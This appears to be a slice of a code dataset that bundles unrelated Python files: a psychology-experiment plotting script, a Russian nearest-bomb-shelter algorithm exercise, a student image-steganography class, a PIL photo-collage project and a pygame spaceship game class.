sns.kdeplot(plot_df.query('subj_ts == 0')['rt'], color = 'm', lw = 5, label = 'TS1')\n sns.kdeplot(plot_df.query('subj_ts == 1')['rt'], color = 'c', lw = 5, label = 'TS2')\n plot_df.query('subj_ts == 0')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_ts == 1')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n plt.xlabel('Reaction Time (ms)', size = fontsize)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n \n \n #***********************************\n # learner nonlearner behavioral plots\n #***********************************\n plot_df = pd.concat([df,df_fail])\n df.groupby(['last_TS','context']).subj_ts.mean().reset_index() \n \n p11 = plt.figure(figsize = figdims)\n p11.subplots_adjust(hspace=.3, wspace = .3)\n \n plt.subplot2grid((2,2),(0,0))\n sns.plt.plot(delays,learner_params, 'b-o', label = 'Learners', markersize = 10)\n sns.plt.plot(delays,nonlearner_params, 'r-o', label = 'Non-Learners', markersize = 10)\n plt.xlabel('Context Lag', size = fontsize)\n plt.ylabel('Beta Weights', size = fontsize)\n pylab.legend(loc='best',prop={'size':20})\n plt.tick_params(labelsize=15)\n \n plt.subplot2grid((2,2),(1,0), colspan = 1)\n sns.plt.scatter(range(len(group_means)),group_means, c = [['r','b'][i] for i in label])\n plt.ylabel('Accuracy', size = fontsize)\n plt.xlabel('Subject Index', size = fontsize)\n plt.xlim([-5,50])\n plt.tick_params(labelsize=15)\n \n plt.subplot2grid((2,2),(1,1), colspan = 1)\n sns.plt.plot(k,k_error, '-o')\n plt.ylabel('SSE', size = fontsize)\n plt.xlabel('Number of Clusters (k)', size = fontsize)\n plt.tick_params(labelsize=15)\n\n plt.subplot2grid((2,2),(0,1))\n for window in [(0,850)]:\n window_df = plot_df.query('trial_count >= %s and trials_since_switch < 27 and trial_count < %s' % (window[0], window[1]))\n plot_dict = {}\n for i in np.unique(window_df['id']):\n temp_df = window_df.query('id == \"%s\"' % i)\n plot_dict[i] = [temp_df.query('trials_since_switch == %s' % i)['correct'].mean() for i in np.unique(temp_df['trials_since_switch']) if np.sum(temp_df['trials_since_switch']==i)>5]\n plot_dict['trials_since_switch'] = list(range(max([len(arr) for arr in plot_dict.values()])))\n subplot_df = pd.DataFrame.from_dict(plot_dict, orient='index').transpose() \n \n subplot_df = pd.melt(subplot_df, id_vars = 'trials_since_switch', var_name = 'id', value_name = 'percent_correct')\n plt.scatter(subplot_df['trials_since_switch'], subplot_df['percent_correct'], color = 'b', alpha = .5) \n group = window_df.groupby('trials_since_switch').mean()['correct']\n 
plt.plot(group.index,group,'b-',lw = 4)\n\n for window in [(0,850)]:\n window_df = df_fail.query('trial_count >= %s and trials_since_switch < 27 and trial_count < %s' % (window[0], window[1]))\n plot_dict = {}\n for i in np.unique(window_df['id']):\n temp_df = window_df.query('id == \"%s\"' % i)\n plot_dict[i] = [temp_df.query('trials_since_switch == %s' % i)['correct'].mean() for i in np.unique(temp_df['trials_since_switch']) if np.sum(temp_df['trials_since_switch']==i)>5]\n plot_dict['trials_since_switch'] = list(range(max([len(arr) for arr in plot_dict.values()])))\n subplot_df = pd.DataFrame.from_dict(plot_dict, orient='index').transpose() \n \n subplot_df = pd.melt(subplot_df, id_vars = 'trials_since_switch', var_name = 'id', value_name = 'percent_correct')\n plt.scatter(subplot_df['trials_since_switch'], subplot_df['percent_correct'], color = 'r', alpha = .5) \n group = window_df.groupby('trials_since_switch').mean()['correct']\n plt.plot(group.index,group,'r-',lw = 4)\n plt.xlim(-1,28) \n plt.tick_params(labelsize=15)\n plt.ylabel('Percent Correct', size = fontsize)\n plt.xlabel('Trials Since Objective TS Switch', size = fontsize)\n\n if save == True:\n p1.savefig('../Plots/TS2%_vs_context.png', format = 'png', dpi = 300)\n p2.savefig('../Plots/Individual_subject_fits.png',format = 'png', dpi = 300)\n p3.savefig('../Plots/rt_vs_posterior_3subj.png', format = 'png', dpi = 300)\n p4.savefig('../Plots/rt_vs_confidence_3subj.png', format = 'png', dpi = 300)\n p5.savefig('../Plots/rt_vs_confidence.png', format = 'png', dpi = 300)\n p6.savefig('../Plots/bias2_param_value.png', format = 'png', dpi = 300)\n p7.savefig('../Plots/model_comparison.png', format = 'png', dpi = 300)\n p10.savefig('../Plots/RTs.png', format = 'png')\n p11.savefig('../Plots/Learner_vs_NonLearner.png', format = 'png', dpi = 300)\n plt.close('all')\n \n ","sub_path":"old_versions/Color_Shape_Task_V1/Analysis/Group_Analysis.py","file_name":"Group_Analysis.py","file_ext":"py","file_size_in_byte":20176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
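The model comparison in the script above is a per-subject BIC: minus two times the log-likelihood plus a parameter-count penalty scaled by the log of the number of observations, which is exactly what -2*summary + param_cost_df builds. A worked version of the formula with toy numbers:

import numpy as np

def bic(log_likelihood, n_params, n_obs):
    # BIC = -2 * lnL + k * ln(n); lower is better
    return -2 * log_likelihood + n_params * np.log(n_obs)

# a 3-parameter model must beat a 2-parameter one by (3-2)*ln(n)/2 nats
# of log-likelihood just to tie on BIC:
print(bic(-400.0, 3, 850))                      # 3-parameter model
print(bic(-400.0 - 0.5 * np.log(850), 2, 850))  # same BIC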
+{"seq_id":"18208723","text":"'''\nШтаб гражданской обороны Тридесятой области решил обновить план спасения на случай ядерной атаки. Известно, что все n\nселений Тридесятой области находятся вдоль одной прямой дороги. Вдоль дороги также расположены m бомбоубежищ, в которых\nжители селений могут укрыться на случай ядерной атаки.\nЧтобы спасение в случае ядерной тревоги проходило как можно эффективнее, необходимо для каждого селения определить\nближайшее к нему бомбоубежище.\nФормат ввода\nВ первой строке вводится число n - количество селений (1 <= n <= 100000). Вторая строка содержит n различных целых\nчисел, i-е из этих чисел задает расстояние от начала дороги до i-го селения. В третьей строке входных данных задается\nчисло m - количество бомбоубежищ (1 <= m <= 100000). Четвертая строка содержит m различных целых чисел, i-е из этих\nчисел задает расстояние от начала дороги до i-го бомбоубежища. Все расстояния положительны и не превышают 10⁹. Селение\nи убежище могут располагаться в одной точке.\nФормат вывода\nВыведите n чисел - для каждого селения выведите номер ближайшего к нему бомбоубежища. Бомбоубежища пронумерованы\nот 1 до m в том порядке, в котором они заданы во входных данных.\nУказание\nСоздайте список кортежей из пар (позиция селения, его номер в исходном списке), а также аналогичный список для\nбомбоубежищ. Отсортируйте эти списки.\nПеребирайте селения в поря��ке возрастания.\nДля селения ближайшими могут быть два соседних бомбоубежища, среди них надо выбрать ближайшее. При переходе к следующему\nселению не обязательно искать ближайшее бомбоубежище с самого начала. Его можно искать начиная с позиции, найденной для\nпредыдущего города. Аналогично, не нужно искать подходящее бомбоубежище до конца списка бомбоубежищ: достаточно найти\nсамое близкое. 
Если Вы неэффективно реализуете эту часть, то решение тесты не пройдет.\nДля хранения ответа используйте список, где индекс будет номером селения, а по этому индексу будет запоминаться номер\nбомбоубежища.\n'''\n# не проходит тест 6, может потом как-нить разберусь :)\n\ndef sort_position(n):\n # input data as a tuple with distance and index and sort it out\n tempData = list(map(int, input().split()))\n mylist = []\n for i in range(n):\n manData = (tempData[i], i)\n mylist.append(manData)\n mylist.sort()\n return mylist\n\n\ndef checker(villageList, shelterList):\n # finding nearest shelters before and after the village and comparing the distance to find the closest one\n answer = []\n i = 0\n j = 0\n s_distance_j, shelter_j = shelterList[0]\n while i < len(villageList) and j < len(shelterList):\n v_distance, village = villageList[i]\n s_distance, shelter = shelterList[j]\n if v_distance > s_distance:\n s_distance_j, shelter_j = shelterList[j]\n j += 1\n else:\n diff = abs(v_distance - s_distance)\n diff_j = abs(v_distance - s_distance_j)\n if diff < diff_j:\n answer.append((village + 1, shelter + 1))\n else:\n answer.append((village + 1, shelter_j + 1))\n i += 1\n # filling the answer with the last found shelter if shelters > villages\n for remain_part in range(i, len(villageList)):\n answer.append((i + 1, shelter_j + 1))\n answer.sort()\n return answer\n\n\ndef formatting(mylist):\n for item in mylist:\n print(item[1], end=' ')\n\n\nn = int(input())\nvillageList = sort_position(n)\nm = int(input())\nshelterList = sort_position(m)\n\nformatting(checker(villageList, shelterList))\n\n''' The version which worked out\n\namount_towns = int(input())\ntowns = list(enumerate(map(int, input().split()[:amount_towns]), 1))\namount_shelters = int(input())\nshelters = list(enumerate(map(int, input().split()[:amount_shelters]), 1))\ntowns.sort(key=lambda k: k[1])\nshelters.sort(key=lambda k: k[1])\n\nindex = 0\nresult = []\n\nfor town in towns:\n while (index + 1 < amount_shelters and \n abs(town[1] - shelters[index][1]) > abs(\n town[1] - shelters[index + 1][1])):\n index += 1\n else:\n result.append([town[0], shelters[index][0]])\n\nresult.sort()\nfor i in result:\n print(i[1], end=' ')\n'''\n","sub_path":"week6_bomb_shelters.py","file_name":"week6_bomb_shelters.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
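A tiny worked example of the two-pointer sweep used in the commented-out working version; toy positions instead of stdin input:

# villages at 1, 7, 10 and shelters at 2, 9 (already sorted)
villages = [1, 7, 10]
shelters = [2, 9]
idx = 0
nearest = []
for v in villages:
    # advance while the next shelter is strictly closer
    while idx + 1 < len(shelters) and abs(v - shelters[idx]) > abs(v - shelters[idx + 1]):
        idx += 1
    nearest.append(idx + 1)   # 1-based shelter number
print(nearest)  # [1, 2, 2]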
+{"seq_id":"552946396","text":"\"\"\"\nSteganography methods for the imager application.\n\nThis module provides all of the test processing operations (encode, decode)\nthat are called by the application.\n Note that this class is a subclass of Filter.\nThis allows us to layer this functionality on top of the Instagram-filters,\nproviding this functionality in one application.\n\nBased on an original file by Dexter Kozen (dck10) and Walker White (wmw2)\n\nAuthor: Yan Zhu yz2477 Aroma Dong jd778\nDate: 11/20/2019\n\"\"\"\nimport a6filter\n\n\nclass Encoder(a6filter.Filter):\n \"\"\"\n A class that contains a collection of image processing methods\n\n This class is a subclass of Filter. That means it inherits all of the\n methods and attributes of that class too. We do that separate the\n steganography methods from the image filter methods, making the code\n easier to read.\n\n Both the `encode` and `decode` methods should work with the most recent\n image in the edit history.\n \"\"\"\n\n def encode(self, text):\n \"\"\"\n Returns True if it could hide the text; False otherwise.\n\n This method attemps to hide the given message text in the current\n image. This method first converts the text to a byte list using the\n encode() method in string to use UTF-8 representation:\n\n blist = list(text.encode('utf-8'))\n\n This allows the encode method to support all text, including emoji.\n\n If the text UTF-8 encoding requires more than 999999 bytes or the\n picture does not have enough pixels to store these bytes this method\n returns False without storing the message. However, if the number of\n bytes is both less than 1000000 and less than (# pixels - 10), then\n the encoding should succeed. So this method uses no more than 10\n pixels to store additional encoding information.\n\n Parameter text: a message to hide\n Precondition: text is a string\n \"\"\"\n # You may modify anything in the above specification EXCEPT\n # The first line (Returns True...)\n # The last paragraph (If the text UTF-8 encoding...)\n # The precondition (text is a string)\n assert type(text) == str\n\n current = self.getCurrent()\n\n blist = list(text.encode('utf-8'))\n bnum = len(blist)\n if bnum>999999 or len(current)-10< bnum:\n return False\n\n self._encode_pixel_str(0,'314')\n self._encode_pixel_str(1,'159')\n self._encode_pixel_str(2,'265')\n self._encode_pixel_str(3,'358')\n self._encode_pixel_str(4,'979')\n\n bnum2 = '0'*(6-len(str(bnum)))+str(bnum)\n self._encode_pixel_str(5,bnum2[:3])\n self._encode_pixel_str(6,bnum2[3:])\n\n for p in range(bnum):\n num = str(blist[p])\n if len(num) < 3:\n num = '0'*(3-len(num))+num\n self._encode_pixel_str(7+p,num)\n return True\n\n def decode(self):\n \"\"\"\n Returns the secret message (a string) stored in the current image.\n\n The message should be decoded as a list of bytes. 
Assuming that a list\n blist has only bytes (ints in 0.255), you can turn it into a string\n using UTF-8 with the decode method:\n\n text = bytes(blist).decode('utf-8')\n\n If no message is detected, or if there is an error in decoding the\n message, this method returns None\n \"\"\"\n # You may modify anything in the above specification EXCEPT\n # The first line (Returns the secret...)\n # The last paragraph (If no message is detected...)\n marker = ''\n for n in range(5):\n marker = marker + str(self._decode_pixel(n))\n if marker != '314159265358979':\n return None\n\n try:\n blist = []\n len = self._decode_pixel(5)*1000 + self._decode_pixel(6)\n if len == 0:\n return ''\n for n in range(len):\n blist.append(self._decode_pixel(n+7))\n text = bytes(blist).decode('utf-8')\n return text\n except:\n return None\n\n # HELPER METHODS\n def _decode_pixel(self, pos):\n \"\"\"\n Return: the number n hidden in pixel pos of the current image.\n\n This function assumes that the value was a 3-digit number encoded as\n the last digit in each color channel (e.g. red, green and blue).\n\n Parameter pos: a pixel position\n Precondition: pos is an int with 0 <= p < image length (as a 1d list)\n \"\"\"\n # This is helper. You do not have to use it.\n #You are allowed to change it.\n # There are no restrictions on how you can change it.\n rgb = self.getCurrent()[pos]\n red = rgb[0]\n green = rgb[1]\n blue = rgb[2]\n return (red % 10) * 100 + (green % 10) * 10 + blue % 10\n\n def _encode_pixel_str(self, pos, str):\n \"\"\"\n Encodes the 3-digit number represented by the string in the pixel at\n the position pos in the current image.\n This function will take the string that represents a 3-digit\n number and encode it at the given position.\n The first digit will be encoded in red, the second\n will be encoded in green, and the third be encoded in blue.\n Encoding a byte value will result in an invalid rgb value (> 255)\n thus will be substracted from the tens place of the appropriate\n color value.\n\n Parameter pos: a pixel position\n Precondition: pos is an int and 0 <= p < image length\n Parameter str: a string representation of a number to encode\n Precondition: a str of a 3-digit integer\n \"\"\"\n rgb = self.getCurrent()[pos]\n red = rgb[0]\n green = rgb[1]\n blue = rgb[2]\n\n d1 = int(str[0])\n d2 = int(str[1])\n d3 = int(str[2])\n\n red = (red//10)*10 +d1\n green = (green//10)*10 +d2\n blue = (blue//10)*10 +d3\n\n if red>255:\n red = red-10\n if green>255:\n green = green-10\n if blue>255:\n blue = blue-10\n\n self.getCurrent()[pos] = (red,green,blue)\n","sub_path":"Imager/a6encode.py","file_name":"a6encode.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
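A standalone worked example of the digit-per-channel scheme the class above implements: hide the 3-digit value 257 in one RGB pixel by overwriting the last digit of each channel, then read it back:

pixel = (214, 53, 199)
value = 257
digits = [value // 100, (value // 10) % 10, value % 10]   # [2, 5, 7]
encoded = []
for channel, d in zip(pixel, digits):
    c = (channel // 10) * 10 + d
    if c > 255:          # e.g. 259 would be invalid; back off one tens place
        c -= 10
    encoded.append(c)
print(tuple(encoded))    # (212, 55, 197)

decoded = (encoded[0] % 10) * 100 + (encoded[1] % 10) * 10 + encoded[2] % 10
print(decoded)           # 257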
+{"seq_id":"18518180","text":"import matplotlib.pyplot as plt\r\nimport os.path\r\nimport numpy as np\r\nimport PIL\r\nimport PIL.ImageDraw\r\n\r\n#Open explosion picture in numpy\r\ndirectory = os.path.dirname(os.path.abspath(__file__))\r\nfilepath_explosion = os.path.join(directory, 'explosion.jpg')\r\nexplosion_numpy = plt.imread(filepath_explosion)\r\n\r\n#Open cat image in numpy\r\nfilepath_cat = os.path.join(directory, 'cat.jpg')\r\ncat_numpy = plt.imread(filepath_cat)\r\n\r\n#Open dog image in numpy\r\nfilepath_dog = os.path.join(directory, 'dog.jpg')\r\ndog_numpy = plt.imread(filepath_dog)\r\n\r\n#Convert all numpy images to PIL\r\nexplosion_image_pil = PIL.Image.fromarray(explosion_numpy)\r\ncat_image_pil = PIL.Image.fromarray(cat_numpy)\r\ndog_image_pil = PIL.Image.fromarray(dog_numpy)\r\n\r\n#(Attempting to) cut the background from the cat and dog pictures.\r\ncat_crop = cat_image_pil.crop((404, 262, 1659, 2182))\r\ndog_crop = dog_image_pil.crop((198, 83, 913, 884))\r\n\r\n#Reduce size of cat and dog to fit on explosion picture.\r\ncat_img_small = cat_crop.resize((250, 350))\r\ndog_img_small = dog_crop.resize((550, 380))\r\n\r\n#Place cat and dog on appropriate locations of explosion\r\nexplosion_image_pil.paste(cat_img_small,(877, 656))\r\nexplosion_image_pil.paste(dog_img_small,(304, 155))\r\n\r\n#Convert explosion image back to numpy\r\nexplosion_numpy = np.array(explosion_image_pil)\r\n\r\n#Recolor the cat's eyes to an evil red\r\nfor r in range(719, 730):\r\n for c in range(914, 931):\r\n if sum(explosion_numpy[r][c])< 550:\r\n explosion_numpy[r][c] = [255,0,0] \r\nfor r in range(720, 730):\r\n for c in range(958, 972):\r\n if sum(explosion_numpy[r][c])< 280:\r\n explosion_numpy[r][c] = [255,0,0] \r\n\r\n#Recolor the explosion to...green?\r\nfor r in range(531,847):\r\n for c in range(256,834):\r\n if sum(explosion_numpy[r][c]) > 350:\r\n explosion_numpy[r][c] = [0,177,0]\r\n\r\n#Display the completed image.\r\nfig, ax = plt.subplots(1, 1)\r\nax.imshow(explosion_numpy, interpolation='none')\r\nfig.show()\r\n\r\n#Photos taken from: Wikipedia (reuse with edit rights)","sub_path":"files/1.4 Project.py","file_name":"1.4 Project.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"121419663","text":"import misc, math, orders, pygame, effects\n\ntry:\n import psyco\n psyco.profile()\nexcept ImportError:\n pass\n\nclass Ship():\n #basic stats for drawing & position.\n radius = 8 # Size of the ship from the centre - size of largest part (if multiple parts are added)\n rotation = math.radians(270.0) # Initial rotation of the ship. Changes every now and then for testing, doesn't matter usually.\n # r43 : Changed to rotation instead of intRotation\n dead = False # I'M ALIVEEEE\n #speed stats.\n speed = 2.5\n rotateSpeed = 0.05 # Rotation\n\n health = 1 # integer for the health of the ship\n\n points = [] # List of veticies that make up the ship.\n\n formation = False\n \n def __init__(self, view, player, x, y):\n self.player = player\n self.view = view\n self.colour = self.player.colour\n self.x, self.y = x, y\n self.shieldRadius = self.radius + 2\n self.orders = [orders.Idle(self)]\n self.moving = False\n self.built = False\n self.calcPoints()\n self.calcExtras() # Stuff that isn't points but needs to be calced.\n \n def drawShield(self, hitBy):\n self.view.effects.append(effects.BubbleShield(self, self.view, (self.x, self.y), self.shieldRadius, 0))\n #self.view.effects.append(effects.AngleShield(self, self.view, (self.x, self.y), self.radius + 2, 0, hitBy))\n \n def damaged(self, amount, hitBy):\n self.health -= amount\n self.drawShield(hitBy)\n if self.health <= 0:\n self.die()\n \n def remove(self):\n self.dead = True\n for i in range(len(self.player.ships)):\n if self.player.ships[i] == self:\n del self.player.ships[i]\n break\n for i in range(len(self.view.selectedShips)):\n if self.view.selectedShips[i] == self:\n del self.view.selectedShips[i]\n break\n del self\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. 
Dunno if we want need these but hum.\n\n def calcExtras(self):\n pass\n \n def draw(self):\n if self.needsToCalcPoints:\n self.calcPoints()\n #self.drawOrders()\n pygame.draw.polygon(self.view.screen, misc.BLACK, self.offsetPoints())\n pygame.draw.aalines(self.view.screen, self.colour, True, self.offsetPoints())\n\n def drawOrders(self):\n lastx, lasty = self.x, self.y\n for order in self.orders:\n tempxy = order.xy()\n if not tempxy is False:\n pygame.draw.line(self.view.screen, order.colour, ((lastx - self.view.x) * self.view.zoom, (lasty - self.view.y) * self.view.zoom), ((tempxy[0] - self.view.x) * self.view.zoom, (tempxy[1] - self.view.y) * self.view.zoom))\n #pygame.draw.circle(screen, (20,20,20), ((order.x - view.x) * view.zoom, (order.y - view.y) * view.zoom), 2)\n lastx, lasty = tempxy[0], tempxy[1]\n \n def rotateTowardAngle(self, angle):\n if misc.positive(angle - self.rotation) < self.rotateSpeed: # If rotation speed is bigger than the amount which you need to turn\n self.rotation = angle # then only turn to face the desired angle\n else:\n if misc.normalisedAngle(angle - self.rotation) > math.pi: # If the angle which you're rotating towards is more 180 degrees to the right, it makes more sense to turn left\n self.rotation = misc.normalisedAngle(self.rotation - self.rotateSpeed) # Turn left by self.rotateSpeed\n else:\n self.rotation = misc.normalisedAngle(self.rotation + self.rotateSpeed) # Turn right by self.rotateSpeed\n self.needsToCalcPoints = True\n\n def moveForward(self): \n self.y -= math.cos(self.rotation) * self.speed\n self.x += math.sin(self.rotation) * self.speed\n self.needsToCalcPoints = True\n\n def poll(self):\n #update the ships data\n self.orders[0].poll()\n self.calcExtras()\n# self.view.lowEffects.append(effects.StaticParticle(self.view, self.x + self.radius * math.sin(self.rotation + math.pi), (self.y - self.radius * math.cos(self.rotation + math.pi)), 5))\n\n def angleToXY(self, x, y):\n #calculate the angle from the referenced ships heading to the\n #given x,y point.\n if self.y - y > 0:\n return misc.normalisedAngle(math.atan((self.x-x)/(y-self.y)))\n elif self.y - y == 0:\n return misc.normalisedAngle(-math.atan(self.x-x))\n else:\n return misc.normalisedAngle(math.atan((self.x-x)/(y-self.y))+math.pi)\n\n def distanceFrom(self, x, y):\n #Pythagoras up in this. 
yeah boy.\n return math.sqrt((self.x-x)**2 + (self.y-y)**2)\n\n def offsetPoints(self):\n points = []\n for point in self.points:\n points.append(((point[0] - self.view.x) * self.view.zoom, (point[1] - self.view.y) * self.view.zoom))\n return points\n\n def nextOrder(self):\n self.orders.pop(0)\n if len(self.orders) == 0:\n self.moving = False\n self.orders.append(orders.Idle(self))\n\n def queueOrder(self, order):\n if len(self.orders) > 0:\n if not isinstance(self.orders[-1], orders.Idle):\n self.orders.append(order)\n self.orders[-1].setShip(self)\n else:\n self.setOrder(order)\n else:\n self.setOrder(order)\n\n def setOrder(self, order):\n if self.built:\n self.orders = [order]\n self.orders[0].setShip(self)\n else:\n self.orders = [orders.Idle(self), order]\n self.orders[1].setShip(self)\n\n def justBuilt(self):\n self.nextOrder()\n self.built = True\n\n def select(self):\n self.view.selectedShips.append(self)\n\n def drawBounding( self ):\n #Calculate the scaled center\n xCenter = ( self.x - self.view.x ) * self.view.zoom;\n yCenter = ( self.y - self.view.y ) * self.view.zoom;\n\n #Calculate the scaled size\n zSize = ( ( self.shieldRadius ) * self.view.zoom )\n\n #Calculate the minimum x for the bounding box\n xMin = xCenter - zSize\n xMax = xCenter + zSize\n \n #Calculate the minimum y for the bounding box\n yMin = yCenter - zSize\n yMax = yCenter + zSize\n \n #Draw bounding circle\n pygame.draw.circle(self.view.screen, misc.MIDGREEN, ((self.x - self.view.x) * self.view.zoom, (self.y - self.view.y) * self.view.zoom), (self.shieldRadius + 2) * self.view.zoom, 1)\n\t\t\n \"\"\"\n #Draw bounding box of object\n \n pygame.draw.line(self.view.screen, misc.GREY, ( xMin, yMax ), ( xMax, yMax ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMax, yMax ), ( xMax, yMin ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMax, yMin ), ( xMin, yMin ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMin, yMin ), ( xMin, yMax ),2 )\n \"\"\"\n \n # SPECIFC SHIP CLASSES START HERE ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !\n\nclass S1s1(Ship):\n \"\"\" as of rev 12 now a list\"\"\"\n health = 10\n radius = 5\n shieldRadius = 5\n #buildInfo\n buildCost = 2\n buildTime = 400\n rotateSpeed = 0.05\n speed = 1\n canAttack = True # this ship has a weapon! useful for setting ui & making sure that ships that can't attack when selected\n # with those that can don't get an erroneus attack order.\n launchers = [] # weapon related values\n hardpoints = []\n \n def __init__(self, view, player, x, y):\n self.enginePoint = (x, y) # engine points. one needs to be initialised so it is...\n \"\"\"\n Please note that enginePoints function like hardpoints, due to the nature of the flickerCircle effect.\n Ho hum. If a ship has more than three engines i'll code it as a list. 
or something.\n \n On S1s1 it's calcpointed as a point nearer the rear of the ship.\n \"\"\"\n # and we create a FlickerCircle for it...\n # FlickerCircle.__init__(self, view, xyAsTuple, size, speed, colour):\n self.engineFlicker = effects.FlickerCircle(view, self.enginePoint, 2.5, 0.25, misc.WHITE)\n view.lowEffects.append(self.engineFlicker)\n # this needs to have its xy updated in calcPoints.\n Ship.__init__(self, view, player, x, y)\n \n def calcPoints(self):\n #calculate the hull points relative to the center xy of the ship\n #and the radius given to the ship.\n \n # starboard side\n self.points = [(self.x + self.radius * math.sin(self.rotation), (self.y - self.radius * math.cos(self.rotation))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.7 * math.pi / 3))),\\\n # these two lines are the inner dips for the engine.\n (self.x + (self.radius-3) * math.sin(self.rotation + 2.6 * math.pi / 3), (self.y - (self.radius-3) * math.cos(self.rotation + 2.6 * math.pi / 3))),\\\n (self.x + (self.radius-3) * math.sin(self.rotation + 3.4 * math.pi / 3), (self.y - (self.radius-3) * math.cos(self.rotation + 3.4 * math.pi / 3))),\\\n # port side.\n (self.x + self.radius * math.sin(self.rotation + 3.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.7 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \n def calcExtras(self):\n self.hardpoints = [(self.x + (self.radius + 3) * math.sin(self.rotation), (self.y - (self.radius + 8) * math.cos(self.rotation)), self.rotation)]\n # engine point calcs. THESE NEED TO BE MOVED TO CALCPOINTS WHEN THEY'RE ONLY DRAWING WHEN ONSCREEN.\n # calculate the xy.\n self.enginePoint = ((self.x + (self.radius - 3.5) * math.sin(self.rotation + 3 * math.pi / 3)), (self.y - (self.radius - 3.5) * math.cos(self.rotation + 3 * math.pi / 3)))\n # update the xy.\n if self.moving:\n self.engineFlicker.xy = self.enginePoint\n self.engineFlicker.visible = True # this could be handled in the poll of the FlickerCircle.\n # but it would be less offscreen efficient - this only gets polled when onscreen.\n else:\n self.engineFlicker.visible = False\n i = 0\n for launcher in self.launchers:\n launcher.hardpoint = self.hardpoints[i]\n launcher.poll()\n i += 1\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here, like death count and such.
Not sure if we'll need these yet.\n self.engineFlicker.die()\n\nclass S1s2(Ship):\n \"\"\" as of rev 12, now a list \"\"\"\n intEnginePoint = [2, 3]\n\n #buildInfo\n buildCost = 10\n buildTime = 10\n \n def calcPoints(self):\n self.points = [((self.x + self.radius * math.sin(self.rotation)), (self.y - self.radius * math.cos(self.rotation))),\\\n (self.x + self.radius * math.sin(self.rotation + 1.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 1.7 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 4.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 4.3 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \nclass S1s4(Ship):\n \"\"\" Spear class cruiser \"\"\"\n health = 50\n radius = 20\n shieldRadius = 22\n #buildInfo\n buildCost = 10\n buildTime = 1000\n rotateSpeed = 0.005\n speed = 0.2\n canAttack = True # this ship has a weapon! useful for setting up the UI & making sure that ships that can't attack, when selected\n # together with those that can, don't get an erroneous attack order.\n launchers = [] # weapon related values\n hardpoints = []\n \n def __init__(self, view, player, x, y):\n self.enginePoint2 = self.enginePoint1 = (x, y) # engine points. one needs to be initialised so it is...\n \"\"\"\n Please note that enginePoints function like hardpoints, due to the nature of the flickerCircle effect.\n Ho hum. If a ship has more than three engines I'll code it as a list, or something.\n \n On S1s4 it's calcpointed as a point nearer the rear of the ship.\n \"\"\"\n # and we create a FlickerCircle for it...\n # FlickerCircle.__init__(self, view, xyAsTuple, size, speed, colour):\n self.engineFlicker1 = effects.FlickerCircle(view, self.enginePoint1, 2.5, 0.25, misc.WHITE)\n self.engineFlicker2 = effects.FlickerCircle(view, self.enginePoint2, 2.5, 0.25, misc.WHITE)\n view.lowEffects.append(self.engineFlicker1)\n view.lowEffects.append(self.engineFlicker2)\n # these need to have their xy updated in calcPoints.\n Ship.__init__(self, view, player, x, y)\n \n def calcPoints(self):\n # HOLY COW!\n # starboard side\n # point 0: 0, 0 for this ship. Pointy.\n self.points = [(self.x + self.radius * math.sin(self.rotation), (self.y - self.radius * math.cos(self.rotation))),\\\n # point 1: 2.28 & 9.75 15 - 9.75 = 5.25\n (self.x + (self.radius-5.25) * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - (self.radius-5.25) * math.cos(self.rotation + 2.3 * math.pi / 3))),\\\n # point 2: 2.67 @ 46 ... = 3.5\n (self.x + (self.radius-3.5) * math.sin(self.rotation + 2.67 * math.pi / 3), (self.y - (self.radius-3.5) * math.cos(self.rotation + 2.67 * math.pi / 3))),\\\n # Starboard side engine.\n # point 3: 2.6 & 17.5 ... 15 - 4.375 = 10.625 !!! minus four'd!\n (self.x + (self.radius-6.625) * math.sin(self.rotation + 2.6 * math.pi / 3), (self.y - (self.radius-6.625) * math.cos(self.rotation + 2.6 * math.pi / 3))),\\\n # point 4: 2.79 ~ 2.8 & 14.0 ... 15 - 3.5 = 11.5 !!! minus four'd\n (self.x + (self.radius-7.5) * math.sin(self.rotation + 2.8 * math.pi / 3), (self.y - (self.radius-7.5) * math.cos(self.rotation + 2.8 * math.pi / 3))),\\\n # begin tail assembly.\n # point 5: 2.87 & 49.5 ...
